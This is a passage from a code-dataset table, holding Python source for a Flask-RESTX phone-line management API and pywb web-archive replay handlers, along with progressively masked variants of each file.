code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from flask import abort
from flask_restx import Resource, Namespace, Model, fields, reqparse
from infraestructura.lineas_repo import LineasRepo
from infraestructura.equipos_repo import EquiposRepo
from infraestructura.clientes_lep_repo import ClientesLepRepo
from infraestructura.lineaequipoplan_repo import LineaEquipoPlanRepo
repoLep= LineaEquipoPlanRepo()
repoLepCliente = ClientesLepRepo()
repo = LineasRepo()
repoEquipo = EquiposRepo()
nsLinea = Namespace('lineas', description='Administrador de lineas')
modeloLineaSinN = Model('LineaSinNumero',{
'numero': fields.String(),
'estado': fields.String(),
'activa': fields.Boolean()
})
modeloLinea = modeloLineaSinN.clone('Linea', {
'id': fields.Integer()
})
modeloBusqueda = Model('BusquedaFechas', {
'desde': fields.Date(),
'hasta': fields.Date()
})
nsLinea.models[modeloLinea.name] = modeloLinea
nsLinea.models[modeloLineaSinN.name] = modeloLineaSinN
nsLinea.models[modeloBusqueda.name] = modeloBusqueda
nuevaLineaParser = reqparse.RequestParser(bundle_errors=True)
nuevaLineaParser.add_argument('numero', type=str, required=True)
nuevaLineaParser.add_argument('estado', type=str, required=True)
##PEDRO LOOK AT THIS
##PEDRO LOOK AT THIS
nuevaLineaParser.add_argument('activa', type=bool, required=False)
editarLineaParser = nuevaLineaParser.copy()
editarLineaParser.add_argument('id', type=int, required=True)
buscarLineasParser = reqparse.RequestParser(bundle_errors=True)
buscarLineasParser.add_argument('desde', type=str, required=True)
buscarLineasParser.add_argument('hasta', type=str, required=True)
@nsLinea.route('/')
class LineasResource(Resource):
@nsLinea.marshal_list_with(modeloLinea)
def get(self):
return repo.get_all()
@nsLinea.expect(modeloLineaSinN)
@nsLinea.marshal_with(modeloLinea)
def post(self):
data = nuevaLineaParser.parse_args()
##PEDRO LOOK AT THIS
if(data.estado =="Activada"):
data.activa = True
else:
data.activa = False
f = repo.agregar(data)
if f:
return f, 201
abort(500)
@nsLinea.route('/<int:id>')
class LineasResource(Resource):
@nsLinea.marshal_with(modeloLinea)
def get(self, id):
f = repo.get_by_numero(id)
if f:
return f, 200
abort(404)
@nsLinea.expect(modeloLinea)
def put(self, numero):
data = editarLineaParser.parse_args()
if repo.modificar(numero, data):
return 'Linea modificada', 200
abort(404)
@nsLinea.route('/baja/<int:id>')
class LineasResource(Resource):
def put(self, id):
if repo.baja(id):
# doy de baja en lineaEquipoPlan
repoLep.baja_by_linea(id)
# busco para darle de baja al equipo
# y tener tmb el id pa la tabla cliente_lep
lineaeqplan = repoLep.buscar_by_linea(id)
#doy de baja el equipo
repoEquipo.baja(lineaeqplan.equipo_id)
#doy de baja en tabla cliente_lep
repoLepCliente.bajalep(lineaeqplan.id)
return 'Linea dada de baja', 200
abort(400)
|
normal
|
{
"blob_id": "821e89730fde2e12b24b52b04701c1f3501e0d57",
"index": 8771,
"step-1": "<mask token>\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n <mask token>\n <mask token>\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-2": "<mask token>\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n <mask token>\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-3": "<mask token>\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n if data.estado == 'Activada':\n data.activa = True\n else:\n data.activa = False\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-4": "<mask token>\nnuevaLineaParser.add_argument('numero', type=str, required=True)\nnuevaLineaParser.add_argument('estado', type=str, required=True)\nnuevaLineaParser.add_argument('activa', type=bool, required=False)\n<mask token>\neditarLineaParser.add_argument('id', type=int, required=True)\n<mask token>\nbuscarLineasParser.add_argument('desde', type=str, required=True)\nbuscarLineasParser.add_argument('hasta', type=str, required=True)\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n if data.estado == 'Activada':\n data.activa = True\n else:\n data.activa = False\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-5": "from flask import abort\nfrom flask_restx import Resource, Namespace, Model, fields, reqparse\nfrom infraestructura.lineas_repo import LineasRepo\nfrom infraestructura.equipos_repo import EquiposRepo\nfrom infraestructura.clientes_lep_repo import ClientesLepRepo\nfrom infraestructura.lineaequipoplan_repo import LineaEquipoPlanRepo\nrepoLep= LineaEquipoPlanRepo()\nrepoLepCliente = ClientesLepRepo()\nrepo = LineasRepo()\nrepoEquipo = EquiposRepo()\nnsLinea = Namespace('lineas', description='Administrador de lineas')\nmodeloLineaSinN = Model('LineaSinNumero',{\n 'numero': fields.String(),\n 'estado': fields.String(),\n 'activa': fields.Boolean()\n})\n\nmodeloLinea = modeloLineaSinN.clone('Linea', {\n 'id': fields.Integer()\n})\n\nmodeloBusqueda = Model('BusquedaFechas', {\n 'desde': fields.Date(),\n 'hasta': fields.Date()\n})\n\nnsLinea.models[modeloLinea.name] = modeloLinea\nnsLinea.models[modeloLineaSinN.name] = modeloLineaSinN\nnsLinea.models[modeloBusqueda.name] = modeloBusqueda\n\nnuevaLineaParser = reqparse.RequestParser(bundle_errors=True)\nnuevaLineaParser.add_argument('numero', type=str, required=True)\nnuevaLineaParser.add_argument('estado', type=str, required=True)\n ##PEDRO LOOK AT THIS\n ##PEDRO LOOK AT THIS\n\nnuevaLineaParser.add_argument('activa', type=bool, required=False)\n\neditarLineaParser = nuevaLineaParser.copy()\neditarLineaParser.add_argument('id', type=int, required=True)\n\nbuscarLineasParser = reqparse.RequestParser(bundle_errors=True)\nbuscarLineasParser.add_argument('desde', type=str, required=True)\nbuscarLineasParser.add_argument('hasta', type=str, required=True)\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n\n ##PEDRO LOOK AT THIS\n if(data.estado ==\"Activada\"):\n data.activa = True\n else:\n data.activa = False\n\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n \n \n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n # doy de baja en lineaEquipoPlan\n\n repoLep.baja_by_linea(id)\n\n # busco para darle de baja al equipo \n # y tener tmb el id pa la tabla cliente_lep\n lineaeqplan = repoLep.buscar_by_linea(id)\n\n #doy de baja el equipo\n repoEquipo.baja(lineaeqplan.equipo_id)\n #doy de baja en tabla cliente_lep\n repoLepCliente.bajalep(lineaeqplan.id)\n\n return 'Linea dada de baja', 200\n abort(400) \n\n",
"step-ids": [
3,
7,
8,
9,
12
]
}
|
[
3,
7,
8,
9,
12
] |
import pkgutil
import mimetypes
import time
from datetime import datetime
from pywb.utils.wbexception import NotFoundException
from pywb.utils.loaders import BlockLoader
from pywb.utils.statusandheaders import StatusAndHeaders
from pywb.framework.basehandlers import BaseHandler, WbUrlHandler
from pywb.framework.wbrequestresponse import WbResponse
from pywb.warc.recordloader import ArcWarcRecordLoader
from pywb.warc.resolvingloader import ResolvingLoader
from views import J2TemplateView
from replay_views import ReplayView
from pywb.framework.memento import MementoResponse
from pywb.utils.timeutils import datetime_to_timestamp
#=================================================================
class SearchPageWbUrlHandler(WbUrlHandler):
"""
Loads a default search page html template to be shown when
the wb_url is empty
"""
def __init__(self, config):
self.search_view = (J2TemplateView.
create_template(config.get('search_html'),
'Search Page'))
self.is_frame_mode = config.get('framed_replay', False)
self.response_class = WbResponse
if self.is_frame_mode:
html = config.get('frame_insert_html', 'ui/frame_insert.html')
self.frame_insert_view = (J2TemplateView.
create_template(html, 'Frame Insert'))
self.banner_html = config.get('banner_html', 'banner.html')
if config.get('enable_memento', False):
self.response_class = MementoResponse
else:
self.frame_insert_view = None
self.banner_html = None
def render_search_page(self, wbrequest, **kwargs):
if self.search_view:
return self.search_view.render_response(wbrequest=wbrequest,
prefix=wbrequest.wb_prefix,
**kwargs)
else:
return WbResponse.text_response('No Lookup Url Specified')
def __call__(self, wbrequest):
# root search page
if wbrequest.wb_url_str == '/':
return self.render_search_page(wbrequest)
# render top level frame if in frame mode
# (not supported in proxy mode)
if (self.is_frame_mode and wbrequest.wb_url and
not wbrequest.wb_url.is_query() and
not wbrequest.options['is_proxy']):
if wbrequest.wb_url.is_top_frame:
return self.get_top_frame_response(wbrequest)
else:
wbrequest.final_mod = 'tf_'
return self.handle_request(wbrequest)
def get_top_frame_params(self, wbrequest):
embed_url = wbrequest.wb_url.to_str(mod='')
if wbrequest.wb_url.timestamp:
timestamp = wbrequest.wb_url.timestamp
else:
timestamp = datetime_to_timestamp(datetime.utcnow())
params = dict(embed_url=embed_url,
wbrequest=wbrequest,
timestamp=timestamp,
url=wbrequest.wb_url.url,
banner_html=self.banner_html)
return params
def get_top_frame_response(self, wbrequest):
params = self.get_top_frame_params(wbrequest)
headers = [('Content-Type', 'text/html; charset=utf-8')]
status_headers = StatusAndHeaders('200 OK', headers)
template_result = self.frame_insert_view.render_to_string(**params)
body = template_result.encode('utf-8')
return self.response_class(status_headers, [body], wbrequest=wbrequest)
#=================================================================
# Standard WB Handler
#=================================================================
class WBHandler(SearchPageWbUrlHandler):
def __init__(self, query_handler, config=None):
super(WBHandler, self).__init__(config)
self.index_reader = query_handler
cookie_maker = config.get('cookie_maker')
record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)
paths = config.get('archive_paths')
resolving_loader = ResolvingLoader(paths=paths,
record_loader=record_loader)
self.replay = ReplayView(resolving_loader, config)
self.fallback_handler = None
self.fallback_name = config.get('fallback')
def resolve_refs(self, handler_dict):
if self.fallback_name:
self.fallback_handler = handler_dict.get(self.fallback_name)
def handle_request(self, wbrequest):
try:
cdx_lines, output = self.index_reader.load_for_request(wbrequest)
except NotFoundException as nfe:
return self.handle_not_found(wbrequest, nfe)
if output != 'text' and wbrequest.wb_url.is_replay():
return self.handle_replay(wbrequest, cdx_lines)
else:
return self.handle_query(wbrequest, cdx_lines, output)
def handle_query(self, wbrequest, cdx_lines, output):
return self.index_reader.make_cdx_response(wbrequest,
cdx_lines,
output)
def handle_replay(self, wbrequest, cdx_lines):
cdx_callback = self.index_reader.cdx_load_callback(wbrequest)
return self.replay.render_content(wbrequest,
cdx_lines,
cdx_callback)
def handle_not_found(self, wbrequest, nfe):
if (not self.fallback_handler or
wbrequest.wb_url.is_query() or
wbrequest.wb_url.is_identity):
raise
return self.fallback_handler(wbrequest)
def __str__(self):
return 'Web Archive Replay Handler'
#=================================================================
# Static Content Handler
#=================================================================
class StaticHandler(BaseHandler):
def __init__(self, static_path):
mimetypes.init()
self.static_path = static_path
self.block_loader = BlockLoader()
def __call__(self, wbrequest):
url = wbrequest.wb_url_str.split('?')[0]
full_path = self.static_path + url
try:
data = self.block_loader.load(full_path)
try:
data.seek(0, 2)
size = data.tell()
data.seek(0)
headers = [('Content-Length', str(size))]
except IOError:
headers = None
if 'wsgi.file_wrapper' in wbrequest.env:
reader = wbrequest.env['wsgi.file_wrapper'](data)
else:
reader = iter(lambda: data.read(), '')
content_type, _ = mimetypes.guess_type(full_path)
return WbResponse.text_stream(data,
content_type=content_type,
headers=headers)
except IOError:
raise NotFoundException('Static File Not Found: ' +
wbrequest.wb_url_str)
def __str__(self): # pragma: no cover
return 'Static files from ' + self.static_path
#=================================================================
# Debug Handlers
#=================================================================
class DebugEchoEnvHandler(BaseHandler): # pragma: no cover
def __call__(self, wbrequest):
return WbResponse.text_response(str(wbrequest.env))
#=================================================================
class DebugEchoHandler(BaseHandler): # pragma: no cover
def __call__(self, wbrequest):
return WbResponse.text_response(str(wbrequest))
|
normal
|
{
"blob_id": "df1486afcc99e03510512ed6ed3e8b3471459d50",
"index": 5343,
"step-1": "<mask token>\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n <mask token>\n <mask token>\n <mask token>\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-2": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n <mask token>\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n <mask token>\n <mask token>\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-3": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n <mask token>\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n params = dict(embed_url=embed_url, wbrequest=wbrequest, timestamp=\n timestamp, url=wbrequest.wb_url.url, banner_html=self.banner_html)\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n template_result = self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-4": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n\n def __init__(self, config):\n self.search_view = J2TemplateView.create_template(config.get(\n 'search_html'), 'Search Page')\n self.is_frame_mode = config.get('framed_replay', False)\n self.response_class = WbResponse\n if self.is_frame_mode:\n html = config.get('frame_insert_html', 'ui/frame_insert.html')\n self.frame_insert_view = J2TemplateView.create_template(html,\n 'Frame Insert')\n self.banner_html = config.get('banner_html', 'banner.html')\n if config.get('enable_memento', False):\n self.response_class = MementoResponse\n else:\n self.frame_insert_view = None\n self.banner_html = None\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n params = dict(embed_url=embed_url, wbrequest=wbrequest, timestamp=\n timestamp, url=wbrequest.wb_url.url, banner_html=self.banner_html)\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n template_result = self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-5": "import pkgutil\nimport mimetypes\nimport time\n\nfrom datetime import datetime\n\nfrom pywb.utils.wbexception import NotFoundException\nfrom pywb.utils.loaders import BlockLoader\nfrom pywb.utils.statusandheaders import StatusAndHeaders\n\nfrom pywb.framework.basehandlers import BaseHandler, WbUrlHandler\nfrom pywb.framework.wbrequestresponse import WbResponse\n\nfrom pywb.warc.recordloader import ArcWarcRecordLoader\nfrom pywb.warc.resolvingloader import ResolvingLoader\n\nfrom views import J2TemplateView\nfrom replay_views import ReplayView\nfrom pywb.framework.memento import MementoResponse\nfrom pywb.utils.timeutils import datetime_to_timestamp\n\n\n#=================================================================\nclass SearchPageWbUrlHandler(WbUrlHandler):\n \"\"\"\n Loads a default search page html template to be shown when\n the wb_url is empty\n \"\"\"\n def __init__(self, config):\n self.search_view = (J2TemplateView.\n create_template(config.get('search_html'),\n 'Search Page'))\n\n self.is_frame_mode = config.get('framed_replay', False)\n self.response_class = WbResponse\n\n if self.is_frame_mode:\n html = config.get('frame_insert_html', 'ui/frame_insert.html')\n self.frame_insert_view = (J2TemplateView.\n create_template(html, 'Frame Insert'))\n\n self.banner_html = config.get('banner_html', 'banner.html')\n \n if config.get('enable_memento', False):\n self.response_class = MementoResponse\n\n else:\n self.frame_insert_view = None\n self.banner_html = None\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix,\n 